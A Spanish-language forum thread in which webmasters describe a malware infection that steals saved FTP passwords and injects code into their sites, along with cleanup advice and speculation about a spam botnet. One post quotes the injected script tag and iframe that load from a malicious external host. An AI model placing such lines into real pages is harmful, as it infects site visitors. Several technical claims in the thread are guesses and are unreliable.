Lograron limpiar su web? Porque yo he limpiado todos los .php, pero no encuentro nada en los js ni en los html; y sin embargo se sigue llenando el cache y viendose mal las demás paginas que no son el frontpage

Alguna solución?

aqui describo la eliminacion y el funcionamiento del virus, si en algo ando mal, bienvenidos los comentarios.

Descripcion:
La infecion es a nivel FTP, aun que es probable, que la infecion se produzca por medio de inyeccion de codigo en servidores LINUX es muy dificil ya que estos servidores estan preparados para rechazar ese tipo de inyecciones, pero pude ser en algunos casos.

a mi me paso a nivel http://FTP.
al iniciar mi computadora, me epece a dar cuenta que corrian unos programas en background
DLLHOST corriendo en C y ejecutado por el usuario actual CASTROPC, al ejecutarse este archivo, la pc se alentaba de cierta manera, hasta que el proceso terminaba.

El programa estaba haciendo una conexion FTP, a mihosting y actulizando los archivos.

asi que me di a la tarea de limpiar todos los archivos, PHP, HTML, HTM, JS, una vez limpios, al paso de un par de horas, la infeccion estaba de vuelta, aun cuando cambiaba las contraseñas del Hosting.

Cuando cabiaba las contraseñas, al dream, le escribia la contraña y la guardaba, el virus recuperaba esa contraseña del registro, y al poco rato volvia a ejecutarse y cada vez, y ya era un fastidio ya que no podia trabjar y google, ya me tania catalogado como portador del virus.

PASOS PARA DESINFECTAR.
1.- bajar una copia del sitio a la pc
limpiar todos los archivos de los posibles linas de codigo infectadas, revisar despues de y al final de los archivos JS.

2.- una vez limpios los archivos, cabiar la contraseña del hosting.

3.- una vez cambiada, reiniciar la pc, dejar que se ejecuten todas las aplicaciones normalmente, el virus no podra conectarse, ya que no va a localizar en el registro la ultima contraseña.

4.- no abrir el dreamweaber ni cualquier otro programa de FTP, ya que estos guardan las contraseñas en un registro en la PC, y el virus tiene registrados los 10 mas populares clientes de http://FTP.

5.- la nueva contraseña, ponerla en un archivo de texto, cosa muy importante esa saber que este virus, copia todas las entradas del teclado, asi que es mejor copiar y pegar las contraseñas, para no escribirlas.

6.- Conectarse por medio de http://ftp.usuario@pagina.com, desde el browser o por medio del CPANEL en la seccion de archivos, por alli puede hacer el UPLOAD nuevamente. recordar que si se conectan de esta forma, no guarden la contraseña, por que si no va a ser la misma cosa nuevamente, para escribir la contraseña en estas opciones, copialas y pegalas desde el TXT previo.

7.- incia a actulizar tuwebsite, no tendras probremas de infeccion nuevamente

ULTIMO PASO.
sugiero que la pc se formatee, para que la tengas limpia de todo virus posble.

IMPORTANTE.
este virus ademas de copiar todo lo que se escribe por el teclado y de usar el ftp para infectar, usa la VM para ejecutar codigo background.

CUALES SON LOS FINES DEL VIRUS.
a mi punto de vista, es una botnet, sus obejetivos son el envio de spam y el de un ataque masivo a ciertos servidores.

si se dan cuenta, afecta muchso servidores bajo LINUX/CPANEL, ESTOS SERVIDORES USAN LA FUNCION mail() y la mayoria no estan de estos servidores estan expuestos a estos ataques, asi qeu una inyeccion de codigo PHP, como han de saber igual que ami a ustedes me imagino que sus archivos php, al inicio hay una lina cifrada, ANALICEN ESA LINEA. EVAL(…(….))
si tienen acceso al exim de su servidor, veran como la actividad del mismo Exim, aumenta justo al ajecutar uno de los archivos infectados.

SIGNIFICA QUE ESTA ENVIANDO EMAIL
Seguramente, a de tener conexion remota a una base de datos, donde tomas las listas de mails, para hacer su proceso.

EL ATAQUE MASIVO.
no estoy seguro que se ejecute, pero casi un 70% de seguridad qeu si lo hace.

estos son mis comentarios, cualquier cosa a sus ordenes, mi email, celio_castro@hotmail.com

Tambien otro aporte es que se inserta un archivo php generalmente en las carpetas de imagenes.

Me acuerdo haber encontrado tambien un tutorial de hackeo de servidores para ejecutar codigos de servidor externos a un dominio por medio de pase de doble ? por GET. Ahora no lo puedo encontrar para decirles bien como era la modalidad.

las líneas de mis paginas asp y html son:

“script src=http://skpasoh3.edu-my.net/alumni/robots_old.php ></script”

Esta web te devuelve lo siguiente entre tags de script y encriptado para crear el siguiente Iframe:
iframe src=\”http://skpasoh3.edu-my.net/alumni/robots_old.php?s=s2BeiIpCl&id=”+a+”\”

a intentar limpiar el servidor…

Saludos a todos. Espero que sirva.

José Luis, Neuquén, Argentina.

En mi caso he tenido problemas durante muchos meses hasta que cambié el password del “FTP” y (IMPORTANTE) no guardo la contraseña. O sea, en el cliente de “FTP” creo la cuenta con todos los datos de conexión menos la contraseña.

Es tedioso porque hay que teclearla cada vez que me conecto por “FTP”, pero desde que lo hago así, todas mis webs están “sanas”.

El “FTP” encriptado está bien para que no intercepten el password, pero si guardas la contraseña (sin encriptar) en el disco duro, de poco te servirá.

Según tengo entendido, el “proceso” del que hablas sólo busca ficheros con claves y passwords (en texto plano) por el disco duro, pero no tiene la capacidad de “keylogger” (por el momento, que estos chinos se las saben todas). Pero si tienes otras informaciones, por favor, no dudes en comunicarlo por aquí que siempre va bien ampliar conocimientos sobre el “bicho” este de las narices.

¿Alguien sabe de un buen cliente de FTP, gratis, y que encripte bien sus datos?